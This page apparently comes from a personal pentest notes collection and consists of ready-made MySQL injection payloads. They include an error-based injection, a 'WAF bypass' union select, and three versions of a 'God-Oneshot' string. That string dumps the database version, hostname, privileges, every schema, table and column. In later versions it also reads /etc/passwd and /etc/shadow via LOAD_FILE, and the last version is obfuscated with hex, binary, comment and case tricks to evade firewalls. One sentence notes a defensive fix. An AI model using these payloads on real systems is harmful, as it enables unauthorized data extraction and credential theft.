+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(columna+AS+CHAR),0x7e))+FROM+table+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Ai test waf bypass
uNion%20sElECt%20%2F*%21%20dAtaBaSE()%20*%2F%2b--%2b
Personal
God-Oneshot staff
V1 features:
Database version
hostname
Privileges
Count and enumeration of all databases
Count and enumeration of all tables in the current database with their
respective columns
/*!50000cOnCat*/(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(/*!50000SElECT*/+/*!50000GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)*/+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,0x3c613e546f74616c204261736573206465206461746f733a203c2f613e,0x3c62723e,(SELECT+count(/*!50000cOnCat*/(schema_name))+FROM+INFORMATION_SCHEMA.schemata),0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c613e42617365206465206461746f73207574696c697a6164613a203c2f613e,0x3c62723e,database(),0x3c62723e,0x3c62723e,0x3c613e4e756d65726f206465207461626c61733a203c2f613e,0x3c62723e,(SELECT+count(CONCAT(table_name))+FROM+INFORMATION_SCHEMA.tables+where+table_schema=database()),0x3c62723e,0x3c62723e,0x3c613e5461626c617320792073757320636f6c756d6e61733a203c2f613e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
V1.5 features:
Database version
hostname
Privileges
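Count and enumeration of all databases
Count and enumeration of all tables in the current database with their
respective columns
IFNULL wraps each local file read so that the fallback text is returned when the read yields NULL, i.e. when the account lacks the permissions. LOAD_FILE() returns data only if the database user holds the FILE privilege and secure_file_priv permits the path, so revoking FILE from application accounts closes this step.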
/*!50000cOnCat*/(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c62723e,0x3c613e4469726563746f72696f20696e7374616c63696f6e2062617365206465206461746f733a203c2f613e,@@datadir,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(/*!50000SElECT*/+/*!50000GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)*/+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,0x3c613e4c69737461206465207573756172696f733a203c2f613e,0x3c62723e,(/*!50000SElECT*/+/*!50000IFNULL(group_concat(grantee,privilege_type,is_grantable,0x3c62723e),'NO CUENTAS CON PERMISOS')*/+FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'),0x3c62723e,0x3c62723e,0x3c613e546f74616c204261736573206465206461746f733a203c2f613e,0x3c62723e,(SELECT+count(/*!50000cOnCat*/(schema_name))+FROM+INFORMATION_SCHEMA.schemata),0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select%20grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c613e42617365206465206461746f73207574696c697a6164613a203c2f613e,0x3c62723e,database(),0x3c62723e,0x3c62723e,0x3c613e4e756d65726f206465207461626c61733a203c2f613e,0x3c62723e,(SELECT+count(CONCAT(table_name))+FROM+INFORMATION_SCHEMA.tables+where+table_schema=database()),0x3c62723e,0x3c62723e,0x3c613e5461626c617320792073757320636f6c756d6e61733a203c2f613e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),0x3c62723e,0x3c62723e,0x3c613e4c6f63616c2066696c65207265616420284c696e7578293a203c2f613e,0x3c62723e,0x3c62723e,0x3c613e2f6574632f7061737377643a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/passwd')),'NO CUENTAS CON 
PERMISOS')),0x3c62723e,0x3c62723e,0x3c613e2f6574632f736861646f773a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/shadow')),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0x3c613e2f6574632f67726f75703a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/group')),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0x3c613e2f6574632f686f7374733a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/hosts')),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0x3c613e2f6574632f6f732d72656c656173653a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/os-release')),'NO CUENTAS CON PERMISOS')))
V1.5 adapted to bypass some waf, has:
Database version
hostname
Privileges
Count and enumeration of all databases
Count and enumeration of all tables in the current database with their
respective columns
The IFNULL function was implemented to go to the local file read if you have the permissions
Used encodings:
Hexadecimal
Binary
SQL Comments
URL encoding
Uppercase and lowercase
/*!50000COnCaT*/(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,/*!50000@@VerSion*/,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,/*!50000@@hOstName*/,0x3c62723e,0x3c62723e,0x3c613e4469726563746f72696f20696e7374616c63696f6e2062617365206465206461746f733a203c2f613e,/*!50000@@DatAdir*/,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(/*!50000SelecT*/%20/*!50000grouP_conCat(GRANTEE,0x202d3e20,IS_GRANTABLE)*/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.USEr_PRiVIleGES*/),0x3c62723e,0x3c62723e,0b0011110001100001001111100101010101110011011101010110000101110010011010010110111101110011001000000110001101101111011011100010000001110000011001010111001001101101011010010111001101101111011100110010000001110010011011110110111101110100001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000IfNuLL(/*!50000grouP_conCat(grantee,privilege_type,is_grantable,0x3c62723e),%27NO%20CUENTAS%20CON%20PERMISOS%27)*/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.USEr_PRiVIleGES*/%20/*!50000WHERe%20/**8**/*/+/*!50000privilege_type/**8**/*/%20=%20%27SUPER%27),0x3c62723e,0x3c62723e,0b001111000110000100111110010011100111010101101101001011100010000001100010011000010111001101100101001000000110010001100101001000000110010001100001011101000110111101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000CoUnT(/*!50000COnCaT*/(/*!50000schema_name/**8**/*/)/**8**/)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/)/**8**/,0x3c62723e,0x3c62723e,0b0011110001100001001111100110001001100001011100110110010101110011001000000110010001100101001000000110010001100001011101000110111101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000grouP_conCat(/*!50000schema_name/**8**/*/,0x3c62723e)/**8**/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0b0011110001100001001111100100111001110101011011
0100101110001000000110001001100001011100110110010100100000011001000110010100100000011101000110000101100010011011000110000101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000CoUnT(/*!50000COnCaT*/(/*!50000table_name/**8**/*/))+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.tabLes*/+/*!50000wHerE*/+/*!50000table_schema*/=/*!50000databAse/**8**/()*//**/),0x3c62723e,(/*!50000SelecT*/(@x)/*!50000fRom/**8**/*/(/*!50000SelecT*/(@x:=0x00),(/*!50000SelecT*/(0)/*!50000fRom/**8**/*/(/*!50000iNfoRmAtiOn_sChEmA/**_**/.cOlumNs*/)/*!50000where/**8**/*/(/*!50000table_schema*/=/*!50000databAse/**8**/()*//**/)/*!50000and*/(0x00)in(@x:=/*!50000COnCaT*/+(@x,0x3c62723e,/*!50000tablE_name*/,0x203a3a20,/*!50000columN_name*/))))x),0x3c62723e,0x3c62723e,0b001111000110000100111110010011000110111101100011011000010110110000100000011001100110100101101100011001010010000001110010011001010110000101100100001110100010000000111100001011110110000100111110,0x3c62723e,0x3c62723e,0b0011110001100001001111100010111101100101011101000110001100101111011100000110000101110011011100110111011101100100001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f706173737764)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b001011110110010101110100011000110010111101110011011010000110000101100100011011110111011100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f736861646f77)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b0010111101100101011101000110001100101111011001110111001001101111011101010111000000111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f67726f7570)),'NO CUENTAS CON 
PERMISOS')),0x3c62723e,0x3c62723e,0b0010111101100101011101000110001100101111011010000110111101110011011101000111001100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f686f737473)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b00101111011001010111010001100011001011110110111101110011001011010111001001100101011011000110010101100001011100110110010100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f6f732d72656c65617365)),'NO CUENTAS CON PERMISOS')))Last updated